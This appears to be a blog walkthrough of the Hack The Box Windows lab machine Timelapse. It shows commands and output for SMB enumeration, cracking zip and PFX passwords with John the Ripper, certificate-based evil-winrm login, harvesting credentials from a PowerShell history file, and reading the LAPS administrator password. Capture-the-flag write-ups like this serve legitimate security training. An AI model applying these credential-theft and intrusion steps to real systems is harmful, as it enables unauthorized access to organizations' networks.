Writeup for the easy ranked HTB box Timelapse

Posted on Sep 13, 2022



First of all let’s see what Hack The Box stated in their announcement on Twitter.


Well not that many clues there. It’s a Windows machine and it’s supposed to be easy. Let’s see what other hackers reported about this box.


Ok seems to be kind of real life with some CVE that can be used and also some elements of custom exploitation. Let’s start this up and get ourselves machine to attack.


That’s it we have ourselves a machine with an ip-address. Let’s get going.


Scanning network with Nmap

Let’s start by scanning the target for open ports.

└─# nmap -sC -sV -A
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-04 16:47 UTC
Nmap scan report for
Host is up (0.010s latency).
Not shown: 991 filtered tcp ports (no-response)
53/tcp  open  domain        Simple DNS Plus
88/tcp  open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-04-05 00:47:39Z)
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open  microsoft-ds?
464/tcp open  kpasswd5?
593/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp open  ldapssl?
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h59m59s
| smb2-time:
|   date: 2022-04-05T00:48:02
|_  start_date: N/A
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required

TRACEROUTE (using port 80/tcp)
1   0.01 ms
2   1.47 ms

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 75.69 seconds

That’s more or less the usual suspects for a Windows machine. Nmap is reporting av clock skew of almost 8 hours. Let’s take a not of that. First things I like to do when approaching a Windows machine is to see if there are any shares that I can access. Let’s fin out.

Scanning the machine for SMB shares

└─# smbclient -L timelapse.htb
Enter WORKGROUP\GUEST's password:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        Shares          Disk
        SYSVOL          Disk      Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to timelapse.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

There seems to be some stuff there. The one called “Shares” looks like it stands out of the usual. Let’s check it out.

└─# smbclient //timelapse.htb/Shares
Enter WORKGROUP\GUEST's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Oct 25 15:39:15 2021
  ..                                  D        0  Mon Oct 25 15:39:15 2021
  Dev                                 D        0  Mon Oct 25 19:40:06 2021
  HelpDesk                            D        0  Mon Oct 25 15:48:42 2021

                6367231 blocks of size 4096. 1146417 blocks available
smb: \> cd Dev
smb: \Dev\> ls
  .                                   D        0  Mon Oct 25 19:40:06 2021
  ..                                  D        0  Mon Oct 25 19:40:06 2021
  winrm_backup.zip                    A     2611  Mon Oct 25 15:46:42 2021

                6367231 blocks of size 4096. 1146417 blocks available
smb: \Dev\> get winrm_backup.zip
getting file \Dev\winrm_backup.zip of size 2611 as winrm_backup.zip (12.9 KiloBytes/sec) (average 12.9 KiloBytes/sec)

So on that share there was a folder called Dev with a zipfile called winrm_backup.zip. Winrm sounds juicy! Let’s dowload it and before leaving let’s check out the other folder called Helpdesk.

smb: \Dev\> cd ../HelpDesk\
smb: \HelpDesk\> ls
  .                                   D        0  Mon Oct 25 15:48:42 2021
  ..                                  D        0  Mon Oct 25 15:48:42 2021
  LAPS.x64.msi                        A  1118208  Mon Oct 25 14:57:50 2021
  LAPS_Datasheet.docx                 A   104422  Mon Oct 25 14:57:46 2021
  LAPS_OperationsGuide.docx           A   641378  Mon Oct 25 14:57:40 2021
  LAPS_TechnicalSpecification.docx      A    72683  Mon Oct 25 14:57:44 2021

                6367231 blocks of size 4096. 1146417 blocks available

Ok there’s some LAPS installation files and documentation laying around. Let’s take a note of that until later. We could go on to check the other shares but the zip sounds so interesting let’s check that out first of all.

Unpacking the zip file to examine it’s contents

Let’s unpack the zip file.

└─# unzip winrm_backup.zip
Archive:  winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password:

It seems it’s encrypted with a password. Let’s try to crack it using John the Ripper and the rockyou wordlist.

└─# john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 20 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
supremelegacy    (winrm_backup.zip/legacyy_dev_auth.pfx)
1g 0:00:00:00 DONE (2022-04-04 17:02) 5.263g/s 18324Kp/s 18324Kc/s 18324KC/s swimfan12..sunmoony
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

BOOM!!! That was quick. The password seems to be supremelegacy. Time to unzip the archive.

└─# unzip winrm_backup.zip
Archive:  winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password:
  inflating: legacyy_dev_auth.pfx

So inside we find a single .pfx file. That’s a certificate holding both a public and a private part. We can use openssl to extract the private key.

└─# openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out legacyy_dev_auth.key
Enter Import Password:

Once again we are met with a password request. Back to John the Ripper.

└─# pfx2john legacyy_dev_auth.pfx > hash.txt

└─# john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 20 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy       (legacyy_dev_auth.pfx)
1g 0:00:00:09 DONE (2022-04-04 17:08) 0.1015g/s 328511p/s 328511c/s 328511C/s thuglife06..thomasfern
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

This one took just a little bit longer but once again we are lucky in cracking the pasword. This password is “thuglegacy”. Let’s go back to openssl and extracting the private key.

└─# openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out legacyy_dev_auth.key
Enter Import Password:
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:

└─# cat legacyy_dev_auth.key
Bag Attributes
    Microsoft Local Key set: <No Values>
    localKeyID: 01 00 00 00
    friendlyName: te-4a534157-c8f1-4724-8db6-ed12f25c2a9b
    Microsoft CSP Name: Microsoft Software Key Storage Provider
Key Attributes
    X509v3 Key Usage: 90

This time we are successfull. Let’s extract the public part aswell.

└─# openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out legacyy_dev_auth.crt
Enter Import Password:

└─# cat legacyy_dev_auth.crt
Bag Attributes
    localKeyID: 01 00 00 00
subject=CN = Legacyy

issuer=CN = Legacyy


That’s it. We do have the private part and the public part. Let’s try to use them to connect to our target and gain access.

Gaining Access

We will try to connect to the server using the good old evil-winrm. It’s always tedious to get it working so I tend to use the docker image. First of all let’s spawn a new powershell and copy the private and public key out of the Kali docker container into a folder called data.

PS C:\Users\f1rstr3am\Downloads> mkdir data

    Directory: C:\Users\f1rstr3am\Downloads

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----          4/4/2022   7:30 PM                data

PS C:\Users\f1rstr3am\Downloads> docker cp 45a10cce9540:legacyy_dev_auth.key .\data\legacyy_dev_auth.key
PS C:\Users\f1rstr3am\Downloads> docker cp 45a10cce9540:legacyy_dev_auth.crt .\data\legacyy_dev_auth.crt

Now let’s try to connect to the target using the dockerized evil-winrm. I did choose to protect the private key using the same password as the original file “thuglegacy” and I need to use that now.

PS C:\Users\f1rstr3am\Downloads> docker run --rm -ti --name evil-winrm -v  C:\Users\f1rstr3am\Downloads\data:/data oscarakaelvis/evil-winrm -i timelapse.htb -c /data/legacyy_dev_auth.crt -k /data/legacyy_dev_auth.key --ssl

☺☻Evil-WinRM shell v3.3☺☻

☺☻Warning: SSL enabled☺☻

☺☻Info: Establishing connection to remote endpoint☺☻

Enter PEM pass phrase:
*Evil-WinRM* PS C:\Users\legacyy\Documents>

Hell yes we have a shell at our target. Let’s see what we can find!!!

*Evil-WinRM* PS C:\Users\legacyy\Documents> cd ..
*Evil-WinRM* PS C:\Users\legacyy> cd Desktop
*Evil-WinRM* PS C:\Users\legacyy\Desktop> ls

    Directory: C:\Users\legacyy\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         4/4/2022   5:47 PM             34 user.txt

*Evil-WinRM* PS C:\Users\legacyy\Desktop> cat user.txt

YES! The first part of our mission is accomplished. Now let’s see where we can go from here.

Lateral movement

First of all let’s see what users there are in the system.

*Evil-WinRM* PS C:\Users\legacyy\Desktop> Get-ADUser -Filter *

DistinguishedName : CN=Administrator,CN=Users,DC=timelapse,DC=htb
Enabled           : True
GivenName         :
Name              : Administrator
ObjectClass       : user
ObjectGUID        : d81c9e60-4de1-454f-af28-47cc1a289429
SamAccountName    : Administrator
SID               : S-1-5-21-671920749-559770252-3318990721-500
Surname           :
UserPrincipalName :

DistinguishedName : CN=Guest,CN=Users,DC=timelapse,DC=htb
Enabled           : True
GivenName         :
Name              : Guest
ObjectClass       : user
ObjectGUID        : 4f76c58e-f859-43b3-9816-defe98754f7b
SamAccountName    : Guest
SID               : S-1-5-21-671920749-559770252-3318990721-501
Surname           :
UserPrincipalName :

DistinguishedName : CN=krbtgt,CN=Users,DC=timelapse,DC=htb
Enabled           : False
GivenName         :
Name              : krbtgt
ObjectClass       : user
ObjectGUID        : b5e1ba02-44e2-4e7d-9661-4329a01c26f1
SamAccountName    : krbtgt
SID               : S-1-5-21-671920749-559770252-3318990721-502
Surname           :
UserPrincipalName :

DistinguishedName : CN=TheCyberGeek,OU=Admins,OU=Staff,DC=timelapse,DC=htb
Enabled           : True
GivenName         : TheCyberGeek
Name              : TheCyberGeek
ObjectClass       : user
ObjectGUID        : 05aaa631-38f8-418c-99dc-02c0190728c9
SamAccountName    : thecybergeek
SID               : S-1-5-21-671920749-559770252-3318990721-1601
Surname           :
UserPrincipalName : [email protected]

DistinguishedName : CN=Payl0ad,OU=Admins,OU=Staff,DC=timelapse,DC=htb
Enabled           : True
GivenName         : Payl0ad
Name              : Payl0ad
ObjectClass       : user
ObjectGUID        : e205d5ca-3a9a-4348-a498-62512ccf0632
SamAccountName    : payl0ad
SID               : S-1-5-21-671920749-559770252-3318990721-1602
Surname           :
UserPrincipalName : [email protected]

DistinguishedName : CN=Legacyy,OU=Dev,OU=Staff,DC=timelapse,DC=htb
Enabled           : True
GivenName         : Legacyy
Name              : Legacyy
ObjectClass       : user
ObjectGUID        : c5f74830-1fe1-48ec-bc73-29091fa6cd81
SamAccountName    : legacyy
SID               : S-1-5-21-671920749-559770252-3318990721-1603
Surname           :
UserPrincipalName : [email protected]

DistinguishedName : CN=Sinfulz,OU=HelpDesk,OU=Staff,DC=timelapse,DC=htb
Enabled           : True
GivenName         : Sinfulz
Name              : Sinfulz
ObjectClass       : user
ObjectGUID        : 3c63ba91-1526-4c54-93c9-5802824dd2cf
SamAccountName    : sinfulz
SID               : S-1-5-21-671920749-559770252-3318990721-1604
Surname           :
UserPrincipalName : [email protected]

DistinguishedName : CN=Babywyrm,OU=HelpDesk,OU=Staff,DC=timelapse,DC=htb
Enabled           : True
GivenName         : Babywyrm
Name              : Babywyrm
ObjectClass       : user
ObjectGUID        : 11b9e998-4200-4cf8-bde2-7a359d865b46
SamAccountName    : babywyrm
SID               : S-1-5-21-671920749-559770252-3318990721-1605
Surname           :
UserPrincipalName : [email protected]

DistinguishedName : CN=svc_deploy,CN=Users,DC=timelapse,DC=htb
Enabled           : True
GivenName         : svc_deploy
Name              : svc_deploy
ObjectClass       : user
ObjectGUID        : 6c242c8e-8aa7-4110-8458-ee9d8d4096e0
SamAccountName    : svc_deploy
SID               : S-1-5-21-671920749-559770252-3318990721-3103
Surname           :
UserPrincipalName : [email protected]

DistinguishedName : CN=TRX,OU=Admins,OU=Staff,DC=timelapse,DC=htb
Enabled           : True
GivenName         : TRX
Name              : TRX
ObjectClass       : user
ObjectGUID        : 7f759230-0ed1-42fe-acc5-a930d35e3d9b
SamAccountName    : TRX
SID               : S-1-5-21-671920749-559770252-3318990721-5101
Surname           :
UserPrincipalName : [email protected]

Ok, that’s a bunch. I remember that LAPS was laying around. Let’s start by checking if it’s actually used.

*Evil-WinRM* PS C:\Users\legacyy\Documents> reg query "HKLM\Software\Policies\Microsoft Services\AdmPwd" /v AdmPwdEnabled

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft Services\AdmPwd
    AdmPwdEnabled    REG_DWORD    0x1

That pretty much seems to be the case. This means that the password for the local administrator is hanging around in the ActiveDirectory in clear text. Let’s find out who has rights to read it.

*Evil-WinRM* PS C:\Users\legacyy\Documents> Get-ADComputer -Filter * -Properties MS-Mcs-AdmPwd | Where-Object MS-Mcs-AdmPwd -ne $null | FT Name, MS-Mcs-AdmPwd

At least our user did not have permissions to read it. That’s the official command from Microsoft to audit this. We need a user that has rights. There was a user called svc_deploy. I would go for that but how? At this point I realised that the Defender virus protection pretty much prevented me from uploading any good recon tools to the target so I started examining things by hand. This https://book.hacktricks.xyz/windows/windows-local-privilege-escalation and this https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html are good references when it comes to Windows priv esc. And after trying a bunch of things I found this:

*Evil-WinRM* PS C:\Users\legacyy> type AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *

Ooopsi daisy!!! We found our way to the svc_deploy user. Now I can actually exit the evil-winrm go back to my own machine and connect again as svc_deploy.

PS C:\Users\f1rstr3am\Downloads> $so = New-PSSessionOption -SkipCACheck -SkipCNCheck
PS C:\Users\f1rstr3am\Downloads> $p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
PS C:\Users\f1rstr3am\Downloads> $c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
PS C:\Users\f1rstr3am\Downloads> Enter-PSSession -ComputerName timelapse.htb -Credential $c -port 5986 -UseSSL -SessionOption $so
[timelapse.htb]: PS C:\Users\svc_deploy\Documents>

Now let’s go for Administrator.

Privilege escalation to Administrator

I can try that audit command for LAPS again.

[timelapse.htb]: PS C:\Users\svc_deploy\Documents> Get-ADComputer -Filter * -Properties MS-Mcs-AdmPwd | Where-Object MS-Mcs-AdmPwd -ne $null | FT Name, MS-Mcs-AdmPwd

Name MS-Mcs-AdmPwd
---- -------------
DC01 F}-Cr98jerlGX289.#yJ99)1

BOOOM! We now do have the local administrators password let’s exit once again and try to connect remotely using our credentials.

PS C:\Users\f1rstr3am\Downloads> $so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
PS C:\Users\f1rstr3am\Downloads> $p = ConvertTo-SecureString 'F}-Cr98jerlGX289.#yJ99)1' -AsPlainText -Force
PS C:\Users\f1rstr3am\Downloads> $c = New-Object System.Management.Automation.PSCredential ('Administrator', $p)
PS C:\Users\f1rstr3am\Downloads> Enter-PSSession -ComputerName timelapse.htb -credential $c -port 5986 -usessl -SessionOption $so
[timelapse.htb]: PS C:\Users\Administrator\Documents> cd ..\Desktop\
[timelapse.htb]: PS C:\Users\Administrator\Desktop> dir
[timelapse.htb]: PS C:\Users\Administrator\Desktop>

And BOOM again but??? What the heck?? There’s nothing there? Let’s check the other users.

[timelapse.htb]: PS C:\Users\Administrator\Desktop> dir ..\..\TRX\Desktop\

    Directory: C:\Users\TRX\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         4/4/2022   5:47 PM             34 root.txt

[timelapse.htb]: PS C:\Users\Administrator\Desktop> cat ..\..\TRX\Desktop\root.txt

And there it is!!!!


I do think that this is a typical easy box. Very straight forward and even if you are not familiar with the concepts before they can easily be googled. I did use powershell on Windows to do some remoting but my guess is that you could have used powershell under Linux to do the same thing or just use evil-winrm. But it was an easy match to do some copy and pasting from the history right into Powershell. No need to make things any harder than they actually are.

I really liked this box. I learned some new things. Connecting to a Windows machine with evil-winrm using certificates was new for me. ANd I did like the fact that Winddows defender agressively stopped me from using any of my usual tools. That’s real life and that’s what I want from a box! Good job by d4rkpayl0ad!!!

Until the next time, happy hacking!